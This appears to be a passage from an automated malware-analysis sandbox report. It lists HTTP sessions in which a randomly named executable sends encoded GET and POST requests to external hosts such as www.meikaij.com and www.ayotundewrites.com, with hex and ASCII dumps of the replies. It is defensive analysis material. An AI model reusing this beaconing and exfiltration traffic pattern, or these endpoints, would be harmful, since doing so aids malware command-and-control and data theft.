                                                                                                                                                                                                Data Ascii: k8kkLR1EeuepGZwkLbzcOTxa+N5u4WaYP1CijhQrmhBfsDHD1h0bevWhjrdHZGFngLr+zi+nXrhmc0pRoS6HfswVIoQvioBgNTtIQPZntGN8HBguku10I6RZTWFdqZqZ2EPNDdOvKYh4qQH8NMn+VQG0QNfy34YxsuPeZly3oCGogWllAu96eAraOq9tZUE+ZhTcuPy4mmRQHCV69JmeqbkaVPK7s9J/rQrCOYmTssi44wcarCS
                                                                                                                                                                                                Nov 17, 2023 19:26:27.335561037 CET322OUTData Raw: 79 61 43 34 6f 6f 76 37 71 46 4b 49 78 4c 38 75 43 33 32 54 73 73 48 78 4f 47 43 74 46 6d 6d 4a 67 44 71 78 74 65 48 6b 4f 38 76 48 39 2b 41 2f 77 4e 4e 45 65 6d 7a 79 54 52 64 5a 52 41 33 34 74 7a 43 42 51 38 50 2b 61 38 58 4c 4c 79 67 39 68 4b
                                                                                                                                                                                                Data Ascii: yaC4oov7qFKIxL8uC32TssHxOGCtFmmJgDqxteHkO8vH9+A/wNNEemzyTRdZRA34tzCBQ8P+a8XLLyg9hKU+y3vvce9G2O4d6paPnh7cPCudQNBd7o56zGqxWkOsQJCHbnO4yFNKMjpHGwCfhoJTW+hfL5mpeJCLcOL5B0wW22NS8A48SFG+/NlyhyO+vKv0GVoeR43Els191yb0PLE+yFkOKr3kUGs6NG2nXmkJ1j4CrAI7tOy
                                                                                                                                                                                                Nov 17, 2023 19:26:27.335896015 CET324OUTData Raw: 54 78 77 36 59 59 68 2b 6e 77 6f 6b 59 33 45 58 4c 4f 6e 4d 6e 4c 55 32 51 68 65 36 4a 48 61 45 63 39 56 2b 62 42 35 56 70 76 70 48 2f 36 76 57 45 54 4c 75 4c 78 6a 34 57 56 32 68 52 39 77 65 7a 41 35 35 38 31 54 56 4a 63 6d 66 64 49 54 69 56 41
                                                                                                                                                                                                Data Ascii: Txw6YYh+nwokY3EXLOnMnLU2Qhe6JHaEc9V+bB5VpvpH/6vWETLuLxj4WV2hR9wezA5581TVJcmfdITiVAxAzbL7F43NpiFG3clN7c1NgKV5l27bVIqjO8eja++FRhJrEQMflZZFynGPikbj3+9f7LE3SfsfvYlDcFC6hOYn+P+YUOp4tZ6YgW3cWh8sUI71Z0usW92hr//faiaQevtA7a7vKU7DKfbJZsqc5ZNnXzd2I+tvR9Z
                                                                                                                                                                                                Nov 17, 2023 19:26:27.336538076 CET325INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:26:27 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                content-length: 556
                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                Nov 17, 2023 19:26:27.336848021 CET328OUTData Raw: 55 70 72 69 49 75 39 6f 78 77 36 2b 6f 4e 63 4c 4d 78 37 31 6f 70 52 30 6e 57 2b 63 63 4a 65 56 57 54 49 37 30 4d 46 77 52 53 41 44 71 4d 4f 30 55 35 45 39 73 33 78 6b 6e 6f 6c 32 44 6b 41 4d 34 6f 6a 38 41 38 36 46 43 67 44 52 31 62 41 4b 2b 77
                                                                                                                                                                                                Data Ascii: UpriIu9oxw6+oNcLMx71opR0nW+ccJeVWTI70MFwRSADqMO0U5E9s3xknol2DkAM4oj8A86FCgDR1bAK+wMvyrA1+9ulppc1b0AbIA7XJJMVlnEy6VykAa6pOytndMuokMV2JK/CAvbFLyDvpcCSgZhh2BW+b6i8nFF0Yv2XKPs4TA7NMm0TPXy6tnchmjMGgCbMXpuYWQLxUN66/VnTCxlrNgKwT3rIVbPASXowku5QVbKCzbj
                                                                                                                                                                                                Nov 17, 2023 19:26:27.337019920 CET337OUTData Raw: 2b 49 76 63 39 6d 6f 30 39 61 30 6c 67 55 57 48 37 74 46 46 66 4b 2f 2b 48 34 57 54 33 33 64 4f 4b 59 2f 74 4b 6d 78 32 63 52 2f 64 4a 4b 49 6a 56 41 49 6a 76 72 41 32 2b 6d 67 77 2f 76 47 48 45 73 38 6a 33 34 50 37 66 2f 56 38 69 4f 37 2b 50 4c
                                                                                                                                                                                                Data Ascii: +Ivc9mo09a0lgUWH7tFFfK/+H4WT33dOKY/tKmx2cR/dJKIjVAIjvrA2+mgw/vGHEs8j34P7f/V8iO7+PLWUZmBzGr6IeAPGGIb9m6hYqqF7+ZnlQN/UqmpS/Pg95PjHLMQWVkFFcHgOT7Urla0pA3OvgR3Ze9an60K0hR51WT8DSlpaANy3KHeEZUpF5uBqXUfLGxgjaL+ZkQwONAVETEvHmaHyYXAMsOMb21YeXf7BXxPyLed
                                                                                                                                                                                                Nov 17, 2023 19:26:27.337151051 CET341OUTData Raw: 5a 6c 34 6b 2b 4a 38 67 46 48 33 79 76 70 53 31 58 5a 57 37 75 45 66 43 76 59 57 36 66 57 65 63 52 37 71 54 56 67 63 76 2b 45 47 6e 58 52 50 6f 59 54 4e 6b 53 51 39 31 52 68 37 62 4e 43 73 30 67 51 31 6b 58 4c 35 76 33 62 2b 77 2f 37 64 66 36 7a
                                                                                                                                                                                                Data Ascii: Zl4k+J8gFH3yvpS1XZW7uEfCvYW6fWecR7qTVgcv+EGnXRPoYTNkSQ91Rh7bNCs0gQ1kXL5v3b+w/7df6zkbTT9rEVwkPI61CuMLs4UlitDh0GnatqwkB9nxeKwQopwFr5XeY50hWDkzz+ET5mz2nQSP2Vvuk2WGAP+n6uB0BBdZ8psohoOB9nU87rD0Co6pTqMCAPqkpS6f6LnugCLWfIR+0aQ260OmXThn+6brgS+CfW+BTUJ
                                                                                                                                                                                                Nov 17, 2023 19:26:27.376364946 CET343OUTData Raw: 57 59 74 6a 30 58 71 50 34 35 64 71 35 49 5a 34 75 42 61 47 38 59 61 68 79 39 37 65 70 6f 54 45 4a 53 62 31 55 36 59 79 55 2f 6b 54 6a 59 73 35 4c 62 74 50 6e 61 48 5a 57 57 47 65 6f 48 6c 5a 4f 44 45 71 7a 49 36 66 6d 50 64 43 35 53 6b 49 67 4f
                                                                                                                                                                                                Data Ascii: WYtj0XqP45dq5IZ4uBaG8Yahy97epoTEJSb1U6YyU/kTjYs5LbtPnaHZWWGeoHlZODEqzI6fmPdC5SkIgORwkT7mfhvhKSijACGB8ccIQZBmofWIvpEy4bRrRvVhBmV8Q045T8XfjQXbSWXp0GYJsdCH5B5x+iWGjp2rSRqiHgn9UEkqve0hFP0MwOV4ntu1tkD4TwFTGKoRHH0jmstHAN/OdEqhV48imxFr1AabL3UiqbgLe3z
                                                                                                                                                                                                Nov 17, 2023 19:26:27.529438019 CET346OUTData Raw: 4e 38 57 66 6e 39 4d 48 62 35 70 75 63 49 53 62 71 65 79 6d 36 4b 54 72 6b 6a 32 77 75 76 54 48 45 58 34 2f 54 51 51 61 52 58 6f 6e 73 51 37 7a 59 64 66 47 64 6c 56 58 69 41 79 46 4c 31 57 33 43 71 6f 57 30 51 71 32 63 44 2b 66 6e 4c 77 34 6a 2b
                                                                                                                                                                                                Data Ascii: N8Wfn9MHb5pucISbqeym6KTrkj2wuvTHEX4/TQQaRXonsQ7zYdfGdlVXiAyFL1W3CqoW0Qq2cD+fnLw4j+5g+c9khP4QaDNZYUZxL+g9TS4vSlxR2nXjxxLkRUjMWIjz9Lr39LFJjy3t/Nsnl2H7NPQwObFzyP60aoIk4mKy5gXDLLTAfoJLBkAJ9FTv6PPzlNcQOolGa7ou3ZfmQLRPdgH1GK/vuxAtpIkD9y+j85gfW3ZyUii
                                                                                                                                                                                                Nov 17, 2023 19:26:27.529602051 CET347OUTData Raw: 42 51 51 36 78 6f 2b 51 52 4b 6c 6a 66 72 38 75 74 79 37 49 58 78 50 38 43 2f 46 44 77 6e 47 34 41 53 6d 49 52 47 49 7a 30 4f 4f 39 44 52 7a 69 4a 30 57 36 77 65 56 44 51 46 31 6a 37 6e 46 37 49 6d 76 35 78 72 50 54 34 57 70 76 42 79 54 64 6f 55
                                                                                                                                                                                                Data Ascii: BQQ6xo+QRKljfr8uty7IXxP8C/FDwnG4ASmIRGIz0OO9DRziJ0W6weVDQF1j7nF7Imv5xrPT4WpvByTdoUpnnjP/odTcOEpJz3aWAz+iecuck5A9mvS7eRrw4ApSj/UzzoEETCxG7EQUamo3mEFmQUas3NSOWu5yIv5NKInY87jCyYc1AiN3oT0QGVYJwiEBt39DxXjXK3oL7tBTFfkvqfRo9e2A5V6Nei7N5urxPT627BRD65k
                                                                                                                                                                                                Nov 17, 2023 19:26:27.529773951 CET351OUTData Raw: 2f 31 54 48 30 4f 6d 59 2b 44 51 77 6f 74 53 67 64 47 71 75 76 4b 6a 75 44 59 37 49 4e 6a 6f 4d 2f 68 4a 47 74 77 51 47 45 41 73 57 43 2b 5a 4d 4d 75 6c 63 55 65 6c 6a 5a 6d 63 4e 50 6c 6f 46 36 52 52 35 34 5a 65 6b 69 54 71 6f 35 38 38 4b 39 4d
                                                                                                                                                                                                Data Ascii: /1TH0OmY+DQwotSgdGquvKjuDY7INjoM/hJGtwQGEAsWC+ZMMulcUeljZmcNPloF6RR54ZekiTqo588K9MEawbVUKCgH6iUIfWMZaZlwvK4meLJ5RogljEEAU022KRGMbHyn3IY8GU+C+Md47cHuCkB5O24dozyRTMwFtZXy/XB292D/Dln1EdcjjynSRlHVt+6X/UsV6x69tbnfmMk7WZk0l9zVfSXtKw22kPU7+T6vdUMtZ6o


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                50192.168.11.2050177199.59.243.22580C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:48.249404907 CET1110OUTGET /fbkg/?T6I=JvFp7LObb8w6k6PWFFu4/g+CbhB1FcykldcNag5cVf7fen5OcF+np2qjjm2WzVoow/Lbgs0uDNprrr2Z1f5x8N4+tvsVxyFjvg==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.meikaij.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:30:48.363250971 CET1111INHTTP/1.1 200 OK
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:30:47 GMT
                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                content-length: 1377
                                                                                                                                                                                                x-request-id: 0a64e76a-615e-4239-a6f2-c3eca499503d
                                                                                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_D/57XxsQtzTuNqvArErdM3strXGHjCdR7FGwtPzQ1gClrw1peECdD0BfjrV57lSLhGofulV0LxLVMCtJ1p1Whw==
                                                                                                                                                                                                set-cookie: parking_session=0a64e76a-615e-4239-a6f2-c3eca499503d; expires=Fri, 17 Nov 2023 18:45:48 GMT; path=/
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 2f 35 37 58 78 73 51 74 7a 54 75 4e 71 76 41 72 45 72 64 4d 33 73 74 72 58 47 48 6a 43 64 52 37 46 47 77 74 50 7a 51 31 67 43 6c 72 77 31 70 65 45 43 64 44 30 42 66 6a 72 56 35 37 6c 53 4c 68 47 6f 66 75 6c 56 30 4c 78 4c 56 4d 43 74 4a 31 70 31 57 68 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b
                                                                                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_D/57XxsQtzTuNqvArErdM3strXGHjCdR7FGwtPzQ1gClrw1peECdD0BfjrV57lSLhGofulV0LxLVMCtJ1p1Whw==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
                                                                                                                                                                                                Nov 17, 2023 19:30:48.363322020 CET1112INData Raw: 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68
                                                                                                                                                                                                Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGE2NGU3NmEtNjE1ZS00MjM5LWE2ZjItYzNlY2E0OTk1MDNkIiwicGFnZV90aW1lIjoxNzA


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                50199.59.243.22580192.168.11.2050177C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:48.249404907 CET1110OUTGET /fbkg/?T6I=JvFp7LObb8w6k6PWFFu4/g+CbhB1FcykldcNag5cVf7fen5OcF+np2qjjm2WzVoow/Lbgs0uDNprrr2Z1f5x8N4+tvsVxyFjvg==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.meikaij.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:30:48.363250971 CET1111INHTTP/1.1 200 OK
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:30:47 GMT
                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                content-length: 1377
                                                                                                                                                                                                x-request-id: 0a64e76a-615e-4239-a6f2-c3eca499503d
                                                                                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_D/57XxsQtzTuNqvArErdM3strXGHjCdR7FGwtPzQ1gClrw1peECdD0BfjrV57lSLhGofulV0LxLVMCtJ1p1Whw==
                                                                                                                                                                                                set-cookie: parking_session=0a64e76a-615e-4239-a6f2-c3eca499503d; expires=Fri, 17 Nov 2023 18:45:48 GMT; path=/
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 2f 35 37 58 78 73 51 74 7a 54 75 4e 71 76 41 72 45 72 64 4d 33 73 74 72 58 47 48 6a 43 64 52 37 46 47 77 74 50 7a 51 31 67 43 6c 72 77 31 70 65 45 43 64 44 30 42 66 6a 72 56 35 37 6c 53 4c 68 47 6f 66 75 6c 56 30 4c 78 4c 56 4d 43 74 4a 31 70 31 57 68 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b
                                                                                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_D/57XxsQtzTuNqvArErdM3strXGHjCdR7FGwtPzQ1gClrw1peECdD0BfjrV57lSLhGofulV0LxLVMCtJ1p1Whw==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
                                                                                                                                                                                                Nov 17, 2023 19:30:48.363322020 CET1112INData Raw: 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68
                                                                                                                                                                                                Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGE2NGU3NmEtNjE1ZS00MjM5LWE2ZjItYzNlY2E0OTk1MDNkIiwicGFnZV90aW1lIjoxNzA


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                5183.229.19.7680192.168.11.2050178C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:53.991980076 CET1113OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.ayotundewrites.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.ayotundewrites.com
                                                                                                                                                                                                Referer: http://www.ayotundewrites.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 5a 73 50 41 7a 64 71 73 66 6a 63 32 59 35 58 34 49 38 38 44 4e 6e 6f 69 56 51 33 49 46 45 69 70 46 45 30 56 6d 4a 32 52 61 71 4f 30 67 42 56 6d 76 46 6e 4a 70 4f 77 56 73 72 76 4b 6f 45 4b 44 43 47 35 45 6b 35 36 4e 30 4e 34 4c 6c 4a 74 52 4b 57 49 44 6c 6e 4e 4a 56 36 4d 68 67 39 70 37 52 38 51 4a 77 6d 38 2b 58 6b 42 62 34 4e 67 44 56 4c 6e 57 59 45 6a 42 4a 46 72 77 6e 61 35 2f 6c 36 6b 63 51 67 74 51 2f 41 42 62 35 44 4b 51 77 6b 6c 36 4b 49 61 50 54 55 4c 75 53 64 2b 4b 6a 6e 57 6c 41 4d 33 77 51 33 72 61 73 6c 2b 78 63 51 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=ZsPAzdqsfjc2Y5X4I88DNnoiVQ3IFEipFE0VmJ2RaqO0gBVmvFnJpOwVsrvKoEKDCG5Ek56N0N4LlJtRKWIDlnNJV6Mhg9p7R8QJwm8+XkBb4NgDVLnWYEjBJFrwna5/l6kcQgtQ/ABb5DKQwkl6KIaPTULuSd+KjnWlAM3wQ3rasl+xcQ==
                                                                                                                                                                                                Nov 17, 2023 19:30:54.180856943 CET1114INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:54 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 